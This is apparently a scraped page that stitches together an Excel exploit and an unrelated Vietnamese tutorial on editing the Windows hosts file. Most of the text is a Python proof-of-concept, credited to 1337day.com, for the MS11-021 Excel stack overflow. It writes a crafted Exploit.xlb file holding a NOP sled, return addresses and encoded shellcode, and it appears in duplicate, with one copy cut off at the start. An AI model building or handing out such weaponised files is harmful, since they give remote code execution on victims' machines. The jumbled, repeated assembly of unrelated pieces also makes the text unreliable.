"\x5F\x29\x1E\x04\x36\x00\x2B\x00\x31\x00\x00\x5F\x28\x2A\x20\x23\x2C\x23\x23\x30​\x2E\x30\x30\x5F"

"\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x3B\x5F​\x28\x2A\x20\x22"

"\x2D\x22\x3F\x3F\x5F\x29\x3B\x5F\x28\x40\x5F\x29\xE0\x00\x14\x00\x00\x00\x00\x00​\xF5\xFF\x20\x00")





try:

A = open("Exploit.xlb","wb")

A.write(PoC)

A.close()

print "[*] The file created [*]"

except:

print "[*] Error while creating file [*]"



print "[*] Enter to continue.. [*]"

raw_input()



# 1337day.com [2012-10-02]

Microsoft Office Excel Stack Overflow

# Title : Microsoft Office Excel Stack Overflow
# Auther : Senator of Pirates (Khalil Zhani)
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : Special thanks to my best friend Mr. Marshal Webb
# Tested : on windowns XP SP3(EN) with Microsoft Office Excel 2003

A remote code execution vulnerability exists in the way that Microsoft Excel handles specially
crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control
of an affected system. This is the same vulnerability that is referenced in MS11-021. Proof of concept exploit code included.

PoC =("\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x01\x00\x00\x00"

"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x22\x00\x00\x00\x01\x00\x00\x00​\xFE\xFF\xFF\xFF"

"\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFD\xFF\xFF\xFF\x25\x00\x00\x00\x03\x00\x00\x00​\x04\x00\x00\x00"

"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00​\x0B\x00\x00\x00"

"\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00​\x10\x00\x00\x00"

"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00​\x16\x00\x00\x00"

"\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00\x1A\x00\x00\x00\x1B\x00\x00\x00​\x1C\x00\x00\x00"

"\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00​\xFE\xFF\xFF\xFF"

"\xFE\xFF\xFF\xFF\x24\x00\x00\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x52\x00\x6F\x00​\x6F\x00\x74\x00"

"\x02\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\x02\x00\x00\x00"

"\x20\x08\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x50\x42\x86\x2A\xFB\x9F\xCA\x01\x23\x00\x00\x00\xC0\x02\x00\x00​\x00\x00\x00\x00"

"\x57\x00\x6F\x00\x72\x00\x6B\x00\x62\x00\x6F\x00\x6F\x00\x6B\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x02\x01​\x04\x00\x00\x00"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x02\x00\x00\x00"

"\x7A\x3F\x00\x00\x00\x00\x00\x00\x09\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00​\x72\x00\x79\x00"

"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00\x69\x00\x6F\x00​\x6E\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x28\x00\x02\x01\x01\x00\x00\x00\x03\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x44\x00​\x6F\x00\x63\x00"

"\x75\x00\x6D\x00\x65\x00\x6E\x00\x74\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00​\x72\x00\x79\x00"

"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00\x69\x00\x6F\x00​\x6E\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x38\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x08\x01\x00\x00​\x00\x00\x00\x00"

"\x09\x08\x10\x00\x00\x06\x00\x04\xAA\x1F\xCD\x07\xC9\x00\x05\x00\x06\x04\x00\x00​")

# fields

PoC +=("\xA7\x00\x04\x00\xB0\x0F\x0C\x00\x3C\x00\x00\x03")

# Data + Nops + Shellcode

PoC +=("\x40\xDF\xD6\xD5\x3B\xDF\xD6\xD5\x3B\x00\x00\x00\x00\x00\x00\x00\x00\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xD7\x71\x10\x30\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x50\xFF\x61\x31\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x20\x65\x02​\x44\xDB\xC2\xD9"

"\x74\x24\xF4\x5A\x33\xC9\xB1\x32\x31\x42\x12\x03\x42\x12\x83\xCA\x99\xE0\xB1\xF6​\x8A\x6C\x39\x06"

"\x4B\x0F\xB3\xE3\x7A\x1D\xA7\x60\x2E\x91\xA3\x24\xC3\x5A\xE1\xDC\x50\x2E\x2E\xD3​\xD1\x85\x08\xDA"

"\xE2\x2B\x95\xB0\x21\x2D\x69\xCA\x75\x8D\x50\x05\x88\xCC\x95\x7B\x63\x9C\x4E\xF0​\xD6\x31\xFA\x44"

"\xEB\x30\x2C\xC3\x53\x4B\x49\x13\x27\xE1\x50\x43\x98\x7E\x1A\x7B\x92\xD9\xBB\x7A​\x77\x3A\x87\x35"

"\xFC\x89\x73\xC4\xD4\xC3\x7C\xF7\x18\x8F\x42\x38\x95\xD1\x83\xFE\x46\xA4\xFF\xFD​\xFB\xBF\x3B\x7C"

"\x20\x35\xDE\x26\xA3\xED\x3A\xD7\x60\x6B\xC8\xDB\xCD\xFF\x96\xFF\xD0\x2C\xAD\xFB​\x59\xD3\x62\x8A"

"\x1A\xF0\xA6\xD7\xF9\x99\xFF\xBD\xAC\xA6\xE0\x19\x10\x03\x6A\x8B\x45\x35\x31\xC1​\x98\xB7\x4F\xAC"

"\x9B\xC7\x4F\x9E\xF3\xF6\xC4\x71\x83\x06\x0F\x36\x7B\x4D\x12\x1E\x14\x08\xC6\x23​\x79\xAB\x3C\x67"

"\x84\x28\xB5\x17\x73\x30\xBC\x12\x3F\xF6\x2C\x6E\x50\x93\x52\xDD\x51\xB6\x30\x80​\xC1\x5A\xB7\x41"

"\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00​\x04\x01\x01\x00"

"\x38\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00​\x62\x00\x72\x00"

"\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x38\x00\xBC\x02\x00\x00\x00\x02\x00\xFA​\x07\x01\x43\x00"

"\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00​\x11\x00\x90\x01"

"\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00​\x69\x00\x31\x00"

"\x1E\x00\xDC\x00\x00\x00\x14\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00​\x61\x00\x6C\x00"

"\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x3C\x00\x90\x01​\x00\x00\x00\x02"

"\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00​\x1E\x00\xDC\x00"

"\x00\x00\x3E\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00​\x69\x00\x62\x00"

"\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x3F\x00\xBC\x02\x00\x00\x00\x02​\x00\xFA\x07\x01"

"\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00​\x01\x00\x34\x00"

"\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00​\x72\x00\x69\x00"

"\x31\x00\x1E\x00\xDC\x00\x00\x00\x34\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01​\x43\x00\x61\x00"

"\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x09\x00​\xBC\x02\x00\x00"

"\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00​\x31\x00\x1E\x00"

"\xDC\x00\x00\x00\x0B\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00​\x6C\x00\x69\x00"

"\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x02\x00\x17\x00\x90\x01\x00\x00​\x00\x02\x00\xFA"

"\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00​\xDC\x00\x01\x00"

"\x08\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00​\x62\x00\x72\x00"

"\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x09\x00\x90\x01\x00\x00\x00\x02\x00\xFA​\x07\x01\x43\x00"

"\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x1E\x04\x1C\x00\x05\x00\x17\x00​\x00\x22\x24\x22"

"\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29​\x1E\x04\x21\x00"

"\x06\x00\x1C\x00\x00\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5B\x52\x65\x64​\x5D\x5C\x28\x22"

"\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04\x22\x00\x07\x00\x1D\x00\x00\x22\x24​\x22\x23\x2C\x23"

"\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30​\x30\x5C\x29\x1E"

"\x04\x27\x00\x08\x00\x22\x00\x00\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F​\x29\x3B\x5B\x52"

"\x65\x64\x5D\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x1E\x04​\x37\x00\x2A\x00"

"\x32\x00\x00\x5F\x28\x22\x24\x22\x2A\x20\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5F\x28​\x22\x24\x22\x2A"

"\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D​\x22\x5F\x29\x3B"

"\x5F\x28\x40\x5F\x29\x1E\x04\x2E\x00\x29\x00\x29\x00\x00\x5F\x28\x2A\x20\x23\x2C​\x23\x23\x30\x5F"

"\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C\x29\x3B\x5F\x28\x2A\x20​\x22\x2D\x22\x5F"

"\x29\x3B\x5F\x28\x40\x5F\x29\x1E\x04\x3F\x00\x2C\x00\x3A\x00\x00\x5F\x28\x22\x24​\x22\x2A\x20\x23"

"\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x5C\x28\x23​\x2C\x23\x23\x30"

"\x2E\x30\x30\x5C\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x3F\x3F\x5F\x29​\x3B\x5F\x28\x40"

"\x5F\x29\x1E\x04\x36\x00\x2B\x00\x31\x00\x00\x5F\x28\x2A\x20\x23\x2C\x23\x23\x30​\x2E\x30\x30\x5F"

"\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x3B\x5F​\x28\x2A\x20\x22"

"\x2D\x22\x3F\x3F\x5F\x29\x3B\x5F\x28\x40\x5F\x29\xE0\x00\x14\x00\x00\x00\x00\x00​\xF5\xFF\x20\x00")





try:

A = open("Exploit.xlb","wb")

A.write(PoC)

A.close()

print "[*] The file created [*]"

except:

print "[*] Error while creating file [*]"



print "[*] Enter to continue.. [*]"

raw_input()



# 1337day.com [2012-10-02]

Các thủ thuật hữu ích với file Hosts

File Hosts trong Windows cho phép bạn xác định tên miền của trang web được liên kết với địa chỉ IP. Hơn nữa, các liên kết này được ưu tiên hơn DNS, do đó một vài DNS server chỉ cho phép trang facebook liên kết đến những địa chỉ IP nhất định, nhưng bạn vẫn có thể chỉnh sửa file Hosts để cho phép liên kết facebook đến bất kỳ địa chỉ IP nào, đó cũng là cách để vào facebook hiệu quả nhất hiện nay. Bên cạnh đó, việc chỉnh sửa file Hosts còn có nhiều tính năng hữu ích khác.
cac-thu-thuat-huu-ich-voi-file-hosts
Trước tiên, để chỉnh sửa được file Hosts, bạn phải khởi chạy notepad (hoặc bất kỳ phần mềm chỉnh sửa văn bản nào khác) bằng cách chọn Run as Administrator. Sau khi một trang notepad mới hiện ra, vào File > Open rồi dẫn đến địa chỉ C:\Windows\System32\drivers\etc, chọn hiển thị All File và kích đúp vào tập tin Hosts. Cách thực hiện này sẽ hạn chế lỗi khi lưu file Hosts của bạn so với cách thông thường là chuột phải vào file Hosts và chọn open with ...
Chặn một website
Bạn chỉ cần thêm vào dòng lệnh: 127.0.0.1 abc.com
cac-thu-thuat-huu-ich-voi-file-hosts
Trong đó: abc.com là trang web mà bạn muốn chặn. Cách thức hoạt động của nó là khi bạn truy cập địa chỉ abc.com, máy tính của bạn sẽ bị điều hướng truy cập đến chính máy tính của bạn (127.0.0.1). Trong khi máy tính của bạn không có một máy chủ web, do đó kết nối sẽ thất bại. Biện pháp này rất hữu hiệu cho các bạn muốn ngăn chặn sự kiểm duyệt từ các hãng với phần mềm của mình, chỉ cần đơn giản là chặn các liên kết đến trang web của phần mềm đó.
Tạo phím tắt cho một website
cac-thu-thuat-huu-ich-voi-file-hosts
Bạn có thể tạo một phím tắt cho một trang web ưa thích, để mỗi lần muốn truy cập bạn chỉ cần ấn phím tắt vào thanh địa chỉ và enter, không cần ghi đầy đủ tên một trang web. Để làm được điều này, bạn cần biết địa chỉ IP của trang web mà bạn muốn tạo phím tắt. Vào Start, gõ Command Promp > Enter, cửa sổ Command Promp sẽ hiện ra. Tại đây gõ vào lệnh: ping website_bạn_muốn_tìm_IP rồi enter, ví dụ như: ping google.com. Địa chỉ IP của trang web sẽ hiện ở ngay dòng đầu tiên.
  
cac-thu-thuat-huu-ich-voi-file-hosts
Công việc còn lại chỉ là nhập vào dòng lệnh sau: địa_chỉ_IP_website phím_tắt_bạn_muốn_chuyển vào file Hoste, ví dụ như: 74.125.128.113 G. Sau khi lưu lại, kết quả mỗi lần truy cập bạn chỉ cần gõ G lên thanh địa chỉ và ấn enter, trình duyệt sẽ tự động dẫn đến trang Google.com.
Chuyển hướng website
Tính năng này giống việc chuyển hướng cuộc gọi, bạn có thể chỉnh sửa file Hoste để khi truy cập một trang web, trình duyệt sẽ dẫn đến một trang web khác. Ví dụ như bạn muốn khi gõ vào thanh địa chỉ tên miền Bing.com, trình duyệt sẽ hiện ra trang Google.com, tuy nhiên tính năng này có hữu ích hay không thì còn tùy thuộc vào mỗi người.
Trước tiên bạn sẽ cần kiểm tra địa chỉ IP của trang Bing.com, bằng Command Promp đã nêu ở trên, sau khi đã biết IP của trang web đó ví dụ của Bing là 131.253.13.32, nhập vào file Hosts dòng lệnh:131.253.13.32 Google.com. Tương tự bạn có thể điều hướng một website khác đến bất kỳ website nào bạn muốn.
Chỉ định tên miền cho trang cấu hình router
Nếu bạn thường xuyên phải truy cập vào trang cấu hình router, và muốn tạo một tên miền dễ nhớ cho nó, thì bạn có thể thực hiện tương tự như thủ thuật tạo phím tắt cho website ở trên. Chỉ khác một điều là địa chỉ IP website sẽ được thay bằng địa chỉ Default Gateway, cũng là địa chỉ truy cập trang cấu hình router, và tên miền bạn có thể đặt tùy ý như Gateway, Admin hay chỉ 1 chữ cái như X.
cac-thu-thuat-huu-ich-voi-file-hosts
Ví dụ, câu lệnh có thể như sau:192.168.1.1 Admin hoặc 192.168.1.1 X.
Sử dụng phần mềm quản lý file Hosts
cac-thu-thuat-huu-ich-voi-file-hosts
Với một phần mềm quản lý file Hosts như HostsMan, bạn có thể dễ dàng chỉnh sửa và cập nhật các file Hosts trên trang hpHosts. hpHosts là trang web cung cấp các dữ liệu file Hosts giúp ngăn chặn các trang pop-up, quảng cáo và các trang web độc hại với danh sách liên tục được cập nhật. Bạn có thể lựa chọn ghi đè lên file Hosts hiện tại hoặc sát nhập cả hai để tránh bị mất những thiết lập từ trước của bạn. Bạn cũng có thể chỉnh sửa file Hosts bằng HostsMan với giao diện sử dụng rất đơn giản.
cac-thu-thuat-huu-ich-voi-file-hosts
Bạn có thể tải phần mềm HostsMan tại đây.
Khắc phục lỗi không lưu được file Hosts
Nhiều bạn không sử dụng cách thủ công để chỉnh sửa file Hosts như hướng dẫn ở phần đầu đã giới thiệu, do đó có thể bị lỗi không thể lưu được các thiết lập trong file Hosts. Để khắc phục lỗi này, bạn cần vào thư mục etc, đường dẫn C:\WINDOWS\system32\drivers\etc\, chuột phải vào file hosts và chọn Properties.
cac-thu-thuat-huu-ich-voi-file-hosts
Trong tab General, bỏ chọn Read-only. Chuyển qua tab Security, trong danh sách Group of user name, chọn Users, rồi chọn Edit. Trong khung Permissions chọn Full Control.
Chúc các bạn thành công !
Tham khảo: makeuseof

Các thủ thuật hữu ích với file Hosts

File Hosts trong Windows cho phép bạn xác định tên miền của trang web được liên kết với địa chỉ IP. Hơn nữa, các liên kết này được ưu tiên hơn DNS, do đó một vài DNS server chỉ cho phép trang facebook liên kết đến những địa chỉ IP nhất định, nhưng bạn vẫn có thể chỉnh sửa file Hosts để cho phép liên kết facebook đến bất kỳ địa chỉ IP nào, đó cũng là cách để vào facebook hiệu quả nhất hiện nay. Bên cạnh đó, việc chỉnh sửa file Hosts còn có nhiều tính năng hữu ích khác.
cac-thu-thuat-huu-ich-voi-file-hosts
